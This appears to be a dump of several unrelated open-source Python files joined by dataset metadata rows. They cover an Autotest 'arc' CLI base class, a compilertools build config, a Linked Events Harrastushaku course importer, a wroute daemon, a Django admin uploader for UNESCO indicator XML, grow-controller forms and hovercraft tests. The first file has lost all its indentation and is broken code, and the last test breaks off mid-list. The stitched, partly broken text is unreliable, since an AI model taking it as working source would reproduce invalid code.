"""
Base class for CLI application
"""
def __init__(self, config_klass=None, argument_parser_klass=None):
"""
Initializes a new app instance.
This class is intended both to be used by the stock arcli application
and also to be reused by custom applications. If you want, say, to
limit the amount of command line actions and its arguments, you can
simply supply another argument parser class to this constructor. Of
course another way to customize it is to inherit from this and modify
its members at will.
:param config_klass: an optional configuration class. By default it
will use the arc.config.Config class.
:param argument_parser_klass: an optional argument parser class. By
default it will use arc.cli.args.parser.Parser
"""
#: The application holds a connection instance so that other actions
#: can simply use an already initialized connection for convenience
self.connection = None
self.log = None
self._initialize_log()
self.config = None
self.config_klass = config_klass
self._initialize_config()
self.argument_parser = None
self.argument_parser_klass = argument_parser_klass
self.parsed_arguments = None
self._initialize_argument_parser()
def _initialize_log(self):
"""
Initializes a log instance based on the class name
"""
logging.basicConfig()
self.log = logging.getLogger(self.__class__.__name__)
def _initialize_config(self):
"""
Initializes the configuration system
        We keep track of the configuration class used in case it was overridden
"""
if self.config_klass is None:
self.log.debug("Initializing default config class")
self.config = arc.config.get_default()
else:
self.log.debug("Initializing user supplied config class: %s",
self.config_klass)
self.config = self.config_klass()
def _initialize_argument_parser(self):
"""
Initialize the argument parser, either the default or supplied one
"""
if self.argument_parser_klass is None:
self.log.debug("Initializing default argument parser class")
self.argument_parser = arc.cli.args.parser.Parser(self.config)
self.argument_parser.add_arguments_on_all_modules()
else:
self.log.debug("Initializing user supplied argument parser class:"
" %s", self.argument_parser_klass)
self.argument_parser = self.argument_parser_klass(self.config)
def parse_arguments(self):
"""
Parse the arguments from the command line
"""
self.parsed_arguments = self.argument_parser.parse_args()
if hasattr(self.parsed_arguments, "top_level_action"):
self.log.debug("Action (subparser): %s",
self.parsed_arguments.top_level_action)
def initialize_connection(self):
"""
Initialize the connection instance
"""
if self.connection is not None:
self.log.debug("Connection is already initialized")
else:
if hasattr(self.parsed_arguments, "host"):
h = self.parsed_arguments.host
self.log.debug("Connecting to: %s", h)
try:
self.connection = arc.connection.Connection(h)
except arc.connection.InvalidServiceVersionError:
self.log.error("The RPC interface version on the connected "
"server is more recent than this version of "
"arc can support. Please use a more recent "
"version of arc that should include support "
"for the latest Autotest version.")
raise SystemExit
else:
self.log.warn("Host setting not present on arguments, not "
"initializing a connection")
def dispatch_action(self):
"""
Calls the actions that was specified via command line arguments.
This involves loading the relevant module file.
"""
module_name = "%s.%s" % (arc.defaults.ACTIONS_MODULE_PREFIX,
self.parsed_arguments.top_level_action)
self.log.debug("Attempting to load action module: %s", module_name)
try:
module = importlib.import_module(module_name)
self.log.debug("Action module loaded: %s", module)
except ImportError:
self.log.critical("Could not load action module: %s", module_name)
return
# Filter out the attributes out of the loaded module that look
# like command line actions, based on type and 'is_action' attribute
module_actions = {}
for attribute_name in module.__dict__:
attribute = module.__dict__[attribute_name]
if (isinstance(attribute, types.FunctionType) or
isinstance(attribute, functools.partial)):
if hasattr(attribute, 'is_action'):
if attribute.is_action:
module_actions[attribute_name] = attribute
chosen_action = None
for action in module_actions.keys():
if getattr(self.parsed_arguments, action, False):
self.log.debug("Calling action %s from module %s",
action, module_name)
chosen_action = action
break
kallable = module_actions.get(chosen_action, None)
if kallable is not None:
self.initialize_connection()
return kallable(self)
else:
self.log.error("Action %s specified, but not implemented",
chosen_action)
def run(self):
"""
Main entry point for application
"""
self.parse_arguments()
action_result = self.dispatch_action()
if isinstance(action_result, int):
sys.exit(action_result)
elif isinstance(action_result, bool):
if action_result is True:
sys.exit(0)
else:
sys.exit(1)
| gpl-2.0 | 164,241,412,835,319,800 | 36.586592 | 80 | 0.584275 | false | 4.833333 | true | false | false |
JGoutin/compilertools | compilertools/_config_build.py | 1 | 1889 | """Extra configuration for build"""
class ConfigBuild:
"""Build configuration"""
#: Disable compilertools's optimization while building
disabled = False
    #: Compile optimized for the current machine only (if not, compile for a
    #: cluster of possible machines)
    #: True or False for a manually set value; 'autodetect' to automatically
    #: set the value to True if building from pip
current_machine = "autodetect"
#: Enabled suffixes in files matrix definition.
#: If this set is not empty, includes only suffixes specified inside it.
#: This does not affect current machine builds.
suffixes_includes = set()
#: Disabled suffixes in files matrix definition.
#: If 'suffixes_includes' is empty, completes this set to not build files for a
#: specific architecture.
#: This does not affect current machine builds.
suffixes_excludes = {
"sse",
"ssse3",
"sse4_1",
"sse4_2",
"intel_atom",
"intel",
"amd",
}
#: Enables compilers options
option = {
# Enables Fast floating point math
"fast_fpmath": False
}
#: Specific API are auto-enabled when compiling and linking if following
#: preprocessors are detected in source files
api = {
# openMP
"openmp": {"c": "#pragma omp ", "fortran": ("!$omp ", "c$omp ", "*$omp ")},
# OpenACC
"openacc": {"c": "#pragma acc ", "fortran": ("!$acc ", "c$acc ", "*$acc ")},
# Intel Cilk Plus
"cilkplus": {"c": "#pragma simd ", "fortran": "!dir$ simd "},
}
#: Sources files extensions for code analysis
extensions = {
#: C/C++ sources files extensions
"c": (".c", ".cpp", ".cxx", ".cc", ".c++", ".cp"),
#: Fortran sources files extensions
"fortran": (".f", ".for", ".f90", ".f95", ".f03", ".f08", ".f15"),
}
| bsd-2-clause | 1,016,721,752,809,517,000 | 31.568966 | 88 | 0.582319 | false | 4.019149 | false | false | false |
City-of-Helsinki/linkedevents | events/importer/harrastushaku.py | 1 | 23355 | import logging
import traceback
from collections import namedtuple
from copy import deepcopy
from datetime import datetime, timedelta
from functools import lru_cache, partial
import pytz
import requests
from django.db import transaction
from django.utils.dateparse import parse_time
from django.utils.timezone import now
from django_orghierarchy.models import Organization
from events.importer.sync import ModelSyncher
from events.importer.util import clean_text
from events.importer.yso import KEYWORDS_TO_ADD_TO_AUDIENCE
from events.keywords import KeywordMatcher
from events.models import DataSource, Event, Keyword, Place
from .base import Importer, register_importer
# Per module logger
logger = logging.getLogger(__name__)
HARRASTUSHAKU_API_BASE_URL = 'http://nk.hel.fi/harrastushaku/api/'
TIMEZONE = pytz.timezone('Europe/Helsinki')
MAX_RECURRING_EVENT_LENGTH = 366 # days
MAIN_CATEGORY_KEYWORDS = {
'1': {'yso:p3466'},
'2': {'yso:p916', 'yso:p6062'},
'3': {'yso:p13084', 'yso:p2023'},
'4': {'yso:p2445', 'yso:p20405'},
'5': {'yso:p1808'},
'7': {'yso:p2851'},
'8': {'yso:p1278'},
'9': {'yso:p6940'},
'11': {'yso:p143', 'yso:p9270'},
}
AUDIENCE_BY_AGE_RANGE = (
((0, 6), {'yso:p4354'}),
((7, 16), {'yso:p16485'}),
((10, 18), {'yso:p11617'}),
)
SubEventTimeRange = namedtuple('SubEventTimeRange', ['start', 'end'])
class HarrastushakuException(Exception):
pass
@register_importer
class HarrastushakuImporter(Importer):
name = 'harrastushaku'
supported_languages = ['fi']
def setup(self):
logger.debug('Running Harrastushaku importer setup...')
self.data_source, _ = DataSource.objects.get_or_create(id=self.name, defaults={'name': 'Harrastushaku'})
self.tprek_data_source = DataSource.objects.get(id='tprek')
self.ahjo_data_source, _ = DataSource.objects.get_or_create(id='ahjo', defaults={'name': 'Ahjo'})
self.organization, _ = Organization.objects.get_or_create(origin_id='u48040030',
data_source=self.ahjo_data_source)
self.tprek_ids = {place.origin_id for place in Place.objects.filter(data_source=self.tprek_data_source)}
self.keywords = {keyword.id: keyword for keyword in Keyword.objects.all()}
self.keyword_matcher = KeywordMatcher()
def import_places(self):
"""Import Harrastushaku locations as Places
- If we can find a close-enough match for the location object coming from Harrastushaku in Toimipisterekisteri,
          we do not import that location object, as this will cause a duplicate location issue due to
Harrastushaku data being of low quality.
- If, however, we cannot find a match, location object will be imported with data source "harrastushaku".
"""
logger.info('Importing places...')
locations = self.fetch_locations()
logger.debug('Handling {} locations...'.format(len(locations)))
self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
for location in locations:
try:
self.handle_location(location)
except Exception as e: # noqa
message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
logger.error('Error handling location {}: {}'.format(location.get('id'), message))
def map_harrastushaku_location_ids_to_tprek_ids(self, harrastushaku_locations):
'''
Example mapped dictionary result:
{
'95': 'harrastushaku:95',
'953': 'harrastushaku:953',
'968': 'tprek:20479',
'97': 'tprek:8062',
'972': 'tprek:9079',
'987': 'harrastushaku:987',
'99': 'tprek:8064',
}
'''
result = dict()
for harrastushaku_location in harrastushaku_locations:
harrastushaku_location_id = harrastushaku_location['id']
strict_filters = {
'id__startswith': self.tprek_data_source,
'name': harrastushaku_location['name'],
'address_locality': harrastushaku_location['city'],
'postal_code': harrastushaku_location['zip'],
'street_address': harrastushaku_location['address'],
}
flexible_filters = {
'id__startswith': self.tprek_data_source,
'address_locality': harrastushaku_location['city'],
'postal_code': harrastushaku_location['zip'],
'street_address': harrastushaku_location['address'],
}
tprek_place = (Place.objects.filter(**strict_filters).first() or
Place.objects.filter(**flexible_filters).first())
if tprek_place:
result[harrastushaku_location_id] = tprek_place.id
else:
result[harrastushaku_location_id] = '{}:{}'.format(self.data_source.id, harrastushaku_location_id)
return result
def import_courses(self):
"""Import Harrastushaku activities as Courses
Activities having "active" anything else than "1" or "K" will be
ignored.
When importing and an existing course isn't present in imported data:
- If the course's end time is in the past, the course will be left as
it is.
- If the course's end time is not in the past, the course will be soft
deleted alongside its sub events.
If an activity has something in field "timetables", it will be imported
as a recurring event, otherwise as a one-time event.
A recurring course will have a super event which includes the course's
whole time period, and sub events which will represent individual course
occurrences. Other than start and end times, a super event and its sub
events will all contain the same data.
        A recurring course's sub event start and end datetimes will be built
        using the activity's "timetables". The time tables contain info about
        the weekday, times, and repetition, which means the number of days
        between occurrences (basically a multiple of 7).
A recurring course's sub events will be given an ID that has the
activity's ID and start and end times of the sub event in a compressed
form. This also means that between imports only sub events that are
happening exactly at the same time are considered to be the same instance,
so if a sub event's begin or end time changes at all, a new sub event will
be created instead of updating an old one (because there is no unambiguous
way to determine which old sub event the new one corresponds to).
A course's keywords will come from both of the following:
- The activity's main category. There are hardcoded keywords for every
main category.
- The activity's sub category's "searchwords". Those are manually
entered words, which are mapped to keywords using KeywordMatcher
(from events.keywords).
A course's audience will come from both of the following:
- The activity's "audience_max_age" and "audience_min_age" using
hardcoded keywords for certain age ranges.
- The course's keywords, adding the ones that are present in
KEYWORDS_TO_ADD_TO_AUDIENCE (from events.importer.yso).
"""
logger.info('Importing courses...')
locations = self.fetch_locations()
if not locations:
logger.warning('No location data fetched, aborting course import.')
return
self.location_id_to_place_id = self.map_harrastushaku_location_ids_to_tprek_ids(locations)
activities = self.fetch_courses()
if not activities:
logger.info('No activity data fetched.')
return
def event_delete(event):
if event.end_time < now():
return
event.soft_delete()
for sub_event in event.sub_events.all():
sub_event.soft_delete()
self.event_syncher = ModelSyncher(
Event.objects.filter(data_source=self.data_source, super_event=None),
lambda event: event.id,
event_delete,
)
num_of_activities = len(activities)
logger.debug('Handling {} activities...'.format(num_of_activities))
for i, activity in enumerate(activities, 1):
try:
self.handle_activity(activity)
except Exception as e: # noqa
message = e if isinstance(e, HarrastushakuException) else traceback.format_exc()
logger.error('Error handling activity {}: {}'.format(activity.get('id'), message))
if not i % 10:
logger.debug('{} / {} activities handled.'.format(i, num_of_activities))
self.event_syncher.finish(force=True)
logger.info('Course import finished.')
def fetch_locations(self):
logger.debug('Fetching locations...')
try:
url = '{}location/'.format(HARRASTUSHAKU_API_BASE_URL)
response = requests.get(url)
response.raise_for_status()
return response.json()
except requests.RequestException as e:
logger.error('Cannot fetch locations: {}'.format(e))
return []
def fetch_courses(self):
logger.debug('Fetching courses...')
try:
url = '{}activity/'.format(HARRASTUSHAKU_API_BASE_URL)
response = requests.get(url)
response.raise_for_status()
return response.json()['data']
except requests.RequestException as e:
logger.error('Cannot fetch courses: {}'.format(e))
return []
@transaction.atomic
def handle_location(self, location_data):
harrastushaku_location_id = location_data.get('id')
harrastushaku_location_mapped_id = self.location_id_to_place_id.get(harrastushaku_location_id)
if harrastushaku_location_mapped_id.startswith(self.tprek_data_source.id):
return
else:
self.handle_non_tprek_location(location_data)
def handle_non_tprek_location(self, location_data):
get_string = bind_data_getters(location_data)[0]
place_data = {
'name': get_string('name', localized=True),
'info_url': get_string('url', localized=True),
'street_address': get_string('address', localized=True),
'address_locality': get_string('city', localized=True),
'postal_code': get_string('zip'),
'data_source': self.data_source,
'origin_id': location_data['id'],
'publisher': self.organization,
}
self.save_place(place_data)
@transaction.atomic
def handle_activity(self, activity_data):
if activity_data.get('active') not in ('1', 'K'):
logger.debug('Skipping inactive activity {}'.format(activity_data.get('id')))
return
event_data = self.get_event_data(activity_data)
if event_data['start_time'] > event_data['end_time']:
raise HarrastushakuException('Start time after end time')
time_tables = activity_data.get('timetables', [])
if time_tables:
self.handle_recurring_event(event_data, time_tables)
else:
self.handle_one_time_event(event_data)
def create_registration_links(self, activity_data):
# Harrastushaku has its own registration links, which should also be created in the imported events
if activity_data.get('regavailable', 0) and '1' in activity_data['regavailable']:
# regstartdate and regenddate sometimes contain a "false" value; when regavailable == '1'
# this seems to mean that the registration is open indefinitely
reg_start = activity_data['regstartdate'] if isinstance(activity_data['regstartdate'], int) else 0
reg_end = activity_data['regenddate'] if isinstance(activity_data['regenddate'], int) else 9999999999
if datetime.utcfromtimestamp(reg_start) <= datetime.utcnow() <= datetime.utcfromtimestamp(reg_end):
return {'fi': {'registration': f"https://harrastushaku.fi/register/{activity_data['id']}"}}
return ''
def get_event_data(self, activity_data):
get_string, get_int, get_datetime = bind_data_getters(activity_data)
keywords = self.get_event_keywords(activity_data)
audience = self.get_event_audiences_from_ages(activity_data) | self.get_event_audiences_from_keywords(keywords)
keywords |= audience
event_data = {
'name': get_string('name', localized=True),
'description': get_string('description', localized=True),
'audience_max_age': get_int('agemax'),
'audience_min_age': get_int('agemin'),
'start_time': get_datetime('startdate'),
'end_time': get_datetime('enddate'),
'date_published': get_datetime('publishdate'),
'external_links': self.create_registration_links(activity_data),
'organizer_info': self.get_organizer_info(activity_data),
'extension_course': {
'enrolment_start_date': get_datetime('regstartdate'),
'enrolment_end_date': get_datetime('regenddate'),
'maximum_attendee_capacity': get_int('maxentries'),
'remaining_attendee_capacity': get_int('regavailable'),
},
'data_source': self.data_source,
'origin_id': activity_data['id'],
'publisher': self.organization,
'location': self.get_event_location(activity_data),
'keywords': keywords,
'in_language': self.get_event_languages(activity_data),
'images': self.get_event_images(activity_data),
'offers': self.get_event_offers(activity_data),
'audience': audience,
}
return event_data
def handle_recurring_event(self, event_data, time_tables):
start_date, end_date = self.get_event_start_and_end_dates(event_data)
if not start_date:
raise HarrastushakuException('No start time')
if not end_date:
raise HarrastushakuException('No end time')
if end_date - start_date > timedelta(days=MAX_RECURRING_EVENT_LENGTH):
raise HarrastushakuException('Too long recurring activity')
sub_event_time_ranges = self.build_sub_event_time_ranges(start_date, end_date, time_tables)
if not sub_event_time_ranges:
raise HarrastushakuException('Erroneous time tables: {}'.format(time_tables))
super_event = self.save_super_event(event_data)
self.save_sub_events(event_data, sub_event_time_ranges, super_event)
def handle_one_time_event(self, event_data):
event_data['has_start_time'] = False
event_data['has_end_time'] = False
event = self.save_event(event_data)
self.event_syncher.mark(event)
def get_event_keywords(self, activity_data):
keywords = (self.get_event_keywords_from_main_categories(activity_data) |
self.get_event_keywords_from_search_words(activity_data))
return keywords
def get_event_keywords_from_main_categories(self, activity_data):
main_category_ids = {c.get('maincategory_id') for c in activity_data.get('categories', [])}
keyword_ids = set()
for main_category_id in main_category_ids:
keyword_ids |= MAIN_CATEGORY_KEYWORDS.get(main_category_id, set())
return {self.keywords.get(kw_id) for kw_id in keyword_ids if kw_id in self.keywords}
def get_event_keywords_from_search_words(self, activity_data):
keywords = set()
search_words = activity_data.get('searchwords', '')  # default to '' so the split() below cannot fail on a list
cleaned_search_words = [s.strip().lower() for s in search_words.split(',') if s.strip()]
for kw in cleaned_search_words:
matches = self.match_keyword(kw)
if matches:
keywords |= set(matches)
return keywords
def get_event_languages(self, activity_data):
language_text = activity_data.get('languages', '').lower()
languages = {obj for code, obj in self.languages.items() if obj.name_fi and obj.name_fi in language_text}
return languages
def get_event_start_and_end_dates(self, event_data):
start_datetime = event_data.get('start_time')
start_date = start_datetime.date() if start_datetime else None
end_datetime = event_data.get('end_time')
end_date = end_datetime.date() if end_datetime else None
return start_date, end_date
def get_organizer_info(self, activity_data):
org_details = clean_text(activity_data.get('organiserdetails', ''), strip_newlines=True, parse_html=True)
reg_details = clean_text(activity_data.get('regdetails', ''), strip_newlines=True, parse_html=True)
return {'fi': f'{reg_details} {org_details}'.strip()} if org_details or reg_details else ''
def build_sub_event_time_ranges(self, start_date, end_date, time_tables):
sub_event_time_ranges = []
for time_table in time_tables:
current_date = start_date
weekday = int(time_table.get('weekday'))
start_time = parse_time(time_table.get('starttime'))
end_time = parse_time(time_table.get('endtime'))
repetition = int(time_table.get('repetition'))
if repetition == 0:
repetition = 7 # assume repetition 0 and 7 mean the same thing
if not (weekday and repetition) or start_time >= end_time:
continue
while current_date.isoweekday() != weekday:
current_date += timedelta(days=1)
while current_date <= end_date:
sub_event_time_ranges.append(SubEventTimeRange(
datetime.combine(current_date, start_time).astimezone(TIMEZONE),
datetime.combine(current_date, end_time).astimezone(TIMEZONE),
))
current_date += timedelta(days=repetition)
return sub_event_time_ranges
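# Illustrative example (values assumed, not taken from real data): a timetable entry like
#   {'weekday': '2', 'starttime': '17:00', 'endtime': '18:30', 'repetition': '7'}
# with start_date 2019-09-02 (a Monday) and end_date 2019-09-17 first advances to
# Tuesday 2019-09-03 and then yields one SubEventTimeRange per week:
#   (2019-09-03 17:00, 2019-09-03 18:30), (2019-09-10 ...), (2019-09-17 ...),
# all localized to TIMEZONE.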
def save_super_event(self, event_data):
super_event_data = deepcopy(event_data)
super_event_data['super_event_type'] = Event.SuperEventType.RECURRING
event = self.save_event(super_event_data)
self.event_syncher.mark(event)
return event
def save_sub_events(self, event_data, sub_event_time_ranges, super_event):
super_event._changed = False
def delete_sub_event(obj):
logger.debug('{} deleted'.format(obj))
obj.deleted = True
obj.save()
sub_event_syncher = ModelSyncher(
super_event.sub_events.filter(deleted=False), lambda o: o.id, delete_func=delete_sub_event)
sub_event_data = deepcopy(event_data)
sub_event_data['super_event'] = super_event
for sub_event_time_range in sub_event_time_ranges:
sub_event_data['start_time'] = sub_event_time_range.start
sub_event_data['end_time'] = sub_event_time_range.end
sub_event_data['origin_id'] = (
event_data['origin_id'] + self.create_sub_event_origin_id_suffix(sub_event_time_range))
sub_event = self.save_event(sub_event_data)
if sub_event._changed:
super_event._changed = True
sub_event_syncher.mark(sub_event)
old_sub_event_count = super_event.sub_events.count()
sub_event_syncher.finish(force=True)
if super_event.sub_events.count() != old_sub_event_count:
super_event._changed = True
if super_event._changed:
super_event.save()
def create_sub_event_origin_id_suffix(self, sub_event_time_range):
start, end = sub_event_time_range
assert start.date() == end.date()
date = start.date().strftime('%Y%m%d')
times = '{}{}'.format(*(time.time().strftime('%H%M') for time in (start, end)))
return '_{}{}'.format(date, times)
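# Example (assumed input): a sub event running 2019-09-03 17:00-18:30 yields the suffix
# '_2019090317001830', so a super event origin_id of '123' gives '123_2019090317001830'.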
def get_event_images(self, activity_data):
image_data = activity_data.get('images')
if not isinstance(image_data, dict):
return []
event_image_data = [{
'name': image_datum.get('name', ''),
'url': image_datum.get('filename', ''),
} for image_datum in image_data.values()]
return event_image_data
def get_event_location(self, activity_data):
location_id = activity_data.get('location_id')
if not location_id:
return None
return {'id': self.location_id_to_place_id.get(location_id)}
def get_event_offers(self, activity_data):
offers = []
for price_data in activity_data.get('prices', ()):
get_string = bind_data_getters(price_data)[0]
price = get_string('price', localized=False)
description = get_string('description', localized=True)
is_free = price is not None and price == '0'
if not description and len(activity_data['prices']) == 1:
description = get_string('pricedetails', localized=True)
offers.append({
'price': price if not is_free else None,
'is_free': is_free,
'description': description,
})
return offers
def get_event_audiences_from_ages(self, activity_data):
audience_keyword_ids = set()
age_min = get_int_from_data(activity_data, 'agemin') or 0
age_max = get_int_from_data(activity_data, 'agemax') or 200
for age_range, keyword_ids in AUDIENCE_BY_AGE_RANGE:
if ranges_overlap(age_min, age_max, age_range[0], age_range[1]):
audience_keyword_ids |= keyword_ids
return {self.keywords.get(k_id) for k_id in audience_keyword_ids if k_id in self.keywords}
def get_event_audiences_from_keywords(self, keywords):
return {kw for kw in keywords if kw.id in KEYWORDS_TO_ADD_TO_AUDIENCE}
@lru_cache()
def match_keyword(self, text):
return self.keyword_matcher.match(text)
def get_string_from_data(data, field, localized=False):
value = data.get(field)
if not isinstance(value, str):
return None
value = clean_text(value)
if not value:
return None
return {'fi': value} if localized else value
def get_int_from_data(data, field):
value = data.get(field)
if value in (None, False, ''):
return None
return int(value)
def get_datetime_from_data(data, field):
value = data.get(field)
if value in (None, False, ''):
return None
return datetime.utcfromtimestamp(int(value)).replace(tzinfo=pytz.utc).astimezone(TIMEZONE)
def bind_data_getters(data):
get_string = partial(get_string_from_data, data)
get_int = partial(get_int_from_data, data)
get_datetime = partial(get_datetime_from_data, data)
return get_string, get_int, get_datetime
def ranges_overlap(x1, x2, y1, y2):
return x1 <= y2 and y1 <= x2
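# Quick sanity examples for the overlap test used by the age-range audience mapping:
#   ranges_overlap(7, 12, 0, 6)   -> False  (the ranges do not meet)
#   ranges_overlap(7, 12, 12, 15) -> True   (touching endpoints count as overlap)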
| mit | 8,116,336,283,692,511,000 | 40.117958 | 119 | 0.619739 | false | 3.798796 | false | false | false |
sitian/wing | services/wroute/wrouted.py | 1 | 1264 | # wrouted.py
#
# Copyright (C) 2013 Yi-Wei Ci <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from poller import WRoutePoller
from worker import WRouteWorker
import sys
sys.path.append('../../lib')
from default import WROUTE_ROLE
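# Inferred from the conditionals below (not from documentation): WROUTE_ROLE appears to
# select which services run on this node -- 0 runs the poller only, 1 runs the worker
# only, and any other value runs both.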
if __name__ == '__main__':
if WROUTE_ROLE != 1:
poller = WRoutePoller()
poller.run()
if WROUTE_ROLE != 0:
worker = WRouteWorker()
worker.start()
worker.join()
if WROUTE_ROLE != 1:
poller.join()
| gpl-2.0 | 6,322,507,919,008,522,000 | 34.111111 | 75 | 0.651108 | false | 3.830303 | false | false | false |
VincentVW/OIPA | OIPA/indicator_unesco/admin.py | 3 | 6035 | import xml.etree.cElementTree as etree
from django.contrib import admin
from django.shortcuts import get_object_or_404
from multiupload.admin import MultiUploadAdmin
from indicator.upload_indicators_helper import find_country, find_city, get_countries, get_cities, get_value, save_log, save_city_data, save_country_data
from indicator_unesco.models import UnescoIndicatorData, UnescoIndicator
from translation_model.models import TranslationModel
class UnescoIndicatorDataUploadAdmin(MultiUploadAdmin):
list_display = ['unesco_indicator','country', 'value']
search_fields = ['unesco_indicator']
list_filter = ['unesco_indicator', 'country']
# default value of all parameters:
change_form_template = 'multiupload/change_form.html'
change_list_template = 'multiupload/change_list.html'
multiupload_template = 'multiupload/upload_unesco.html'
# if true, enable multiupload on list screen
# generaly used when the model is the uploaded element
multiupload_list = True
# if true enable multiupload on edit screen
# generaly used when the model is a container for uploaded files
# eg: gallery
# can upload files direct inside a gallery.
multiupload_form = True
# max allowed filesize for uploads in bytes
multiupload_maxfilesize = 3 * 2 ** 20 # 3 Mb
# min allowed filesize for uploads in bytes
multiupload_minfilesize = 0
# tuple with mimetype accepted
multiupload_acceptedformats = ("text/xml",)
def process_uploaded_file(self, uploaded, object, request, **kwargs):
'''
This method will be called for every XML file uploaded.
Parameters:
:uploaded: instance of uploaded file
:object: instance of object if in form_multiupload else None
:kwargs: request.POST received with file
Return:
It MUST return at least a dict with:
{
'url': 'url to download the file',
'thumbnail_url': 'some url for an image_thumbnail or icon',
'id': 'id of instance created in this method',
'name': 'the name of created file',
}
'''
line_counter = 0
country_found = []
country_not_found = []
total_items_saved = 0
countries = get_countries()
#getting the title of the file
title = kwargs.get('title', [''])[0] or uploaded.name
xmlDoc = uploaded
xmlDocData = xmlDoc.read()
xmlDocTree = etree.XML(xmlDocData)
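# The index-based access below implies roughly this element layout for each <CountryId>
# entry (reconstructed from the code, not from the source API documentation; the child
# tag names here are placeholders, only the order and the 'countryid' attribute are real):
#   <CountryId countryid="FI">
#     <Country>Finland</Country>      <!-- [0] country name -->
#     <NameEN>...</NameEN>            <!-- [1] indicator name, English -->
#     <NameFR>...</NameFR>            <!-- [2] indicator name, French -->
#     <Value>...</Value>              <!-- [3] value -->
#     <WebsiteEN>...</WebsiteEN>      <!-- [4] optional website, English -->
#     <WebsiteFR>...</WebsiteFR>      <!-- [5] optional website, French -->
#   </CountryId>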
for indicator in xmlDocTree.iter('CountryId'):
indicator_name_en = indicator[1].text.rstrip()
indicator_name_fr = indicator[2].text.rstrip()
indicator_country = indicator[0].text.rstrip()
country_iso = indicator.get('countryid').rstrip()
value = indicator[3].text.rstrip()
type_value = None
try:
website_en = indicator[4].text.rstrip()
website_fr = indicator[5].text.rstrip()
except IndexError:
website_en = None
website_fr = None
#try to find the indicator that is uploaded or create a new one
indicator_from_db = UnescoIndicator.objects.get_or_create(id=indicator_name_en)[0]
#getting country from our database
country_from_db = find_country(country_name=indicator_country, countries=countries, iso2=country_iso)
#add country to the log array
if country_from_db:
country_found.append(indicator_country)
else:
if indicator_country:
country_not_found.append(indicator_country)
#saving the unesco indicator data
if country_from_db:
indicator_data_from_db = UnescoIndicatorData.objects.get_or_create(unesco_indicator=indicator_from_db, country=country_from_db, value=value)[0]
#storing the translation of the indicator
TranslationModel.objects.get_or_create(key=indicator_name_en, language='en', translation=indicator_name_en)
TranslationModel.objects.get_or_create(key=indicator_name_en, language='fr', translation=indicator_name_fr)
if website_en:
indicator_data_from_db.website = website_en
indicator_data_from_db.save()
#we need to store the translations as well
TranslationModel.objects.get_or_create(key=website_en, language='en', translation=website_en)
TranslationModel.objects.get_or_create(key=website_en, language='fr', translation=website_fr)
total_items_saved += 1
line_counter += 1
log = save_log(file=uploaded,
uploaded_by_user=request.user,
cities_not_found=[],
countries_not_found=country_not_found,
total_cities_found=[],
total_countries_found=country_found,
total_cities_not_found=[],
total_countries_not_found=country_not_found,
total_items_saved=total_items_saved
)
return {
'url': '/admin/indicator/csvuploadlog/%s/' % str(log.id),
'thumbnail_url': '',
'id': str(log.id),
'name' : title,
'country_not_found' : log.countries_not_found,
'total_countries_not_found' : country_not_found.__len__(),
'city_not_found' : log.cities_not_found,
'total_cities_not_found' : 0,
'total_items_saved' : str(total_items_saved),
}
def delete_file(self, pk, request):
'''
Function to delete a file.
'''
# This is the default implementation.
obj = get_object_or_404(self.queryset(request), pk=pk)
obj.delete()
admin.site.register(UnescoIndicatorData, UnescoIndicatorDataUploadAdmin)
admin.site.register(UnescoIndicator)
| agpl-3.0 | 3,671,623,313,713,921,500 | 38.444444 | 159 | 0.613422 | false | 4.18516 | false | false | false |
jpk0727/growApp | apps/base/forms.py | 1 | 2289 | import time
import json
import moment
from datetime import datetime
from django import forms
from base.models import sensors, controller_setpoints
from django.utils.translation import ugettext_lazy as _
from bootstrap3_datetime.widgets import DateTimePicker
# class DateForm(forms.Form):
# start_date = forms.DateField(
# widget=DateTimePicker())
# end_date = forms.DateField(
class DateForm(forms.Form):
end = sensors.objects.latest('time')
end_time = datetime.fromtimestamp(
int(end.time)).strftime('%Y-%m-%d %H:%M')
start = sensors.objects.earliest('time')
start_time = datetime.fromtimestamp(
int(start.time)).strftime('%Y-%m-%d %H:%M')
start_date = forms.DateTimeField(
widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
"locale": "en",
"minDate": start_time,
"maxDate":end_time,
"defaultDate": start_time,
"sideBySide": True}))
end_date = forms.DateTimeField(
widget=DateTimePicker(options={"format": "YYYY-MM-DD HH:mm",
"locale": "en",
"minDate": start_time,
"maxDate":end_time,
"defaultDate":end_time,
"sideBySide": True}))
class ControlForm(forms.ModelForm):
lights_on = forms.TimeField(
widget=DateTimePicker(options={"format": "HH:mm",
"locale":"en",
"pickDate":0}))
lights_off = forms.TimeField(
widget=DateTimePicker(options={"format": "HH:mm",
"locale":"en",
"pickDate":0}))
class Meta:
model = controller_setpoints
fields = ['humidity','r1_water','r2_water','r3_water','water_frequency','lights_on','lights_off']
labels = {
"humidity":_("Relative Percent Humidity"),
"r1_water":_("Number of Seconds to Water Row 1"),
"r2_water":_("Number of Seconds to Water Row 2"),
"r3_water":_("Number of Seconds to Water Row 3"),
"water_frequency":_("How often to water in minutes"),
"lights_on":_("What time of day to start the lights"),
"lights_off":_("What time of day to turn off the lights")
}
| mit | 7,060,045,979,482,628,000 | 34.215385 | 105 | 0.571865 | false | 3.939759 | false | false | false |
regebro/hovercraft | tests/test_position.py | 1 | 30682 | import os
import unittest
from pkg_resources import resource_string
from lxml import etree
from hovercraft.parse import rst2xml, SlideMaker
from hovercraft.position import gather_positions, calculate_positions, position_slides
TEST_DATA = os.path.join(os.path.split(__file__)[0], "test_data")
def make_tree(file_name):
"""Loads reStructuredText, outputs an lxml tree"""
rst = resource_string(__name__, os.path.join("test_data", file_name))
xml, deps = rst2xml(rst)
return SlideMaker(etree.fromstring(xml)).walk()
class GatherTests(unittest.TestCase):
"""Tests that position information is correctly parsed"""
def test_gathering(self):
tree = make_tree("positioning.rst")
positions = list(gather_positions(tree))
self.assertEqual(
positions,
[
{
"data-x": "r0",
"data-y": "r0",
"data-z": "r0",
"data-rotate-x": "r0",
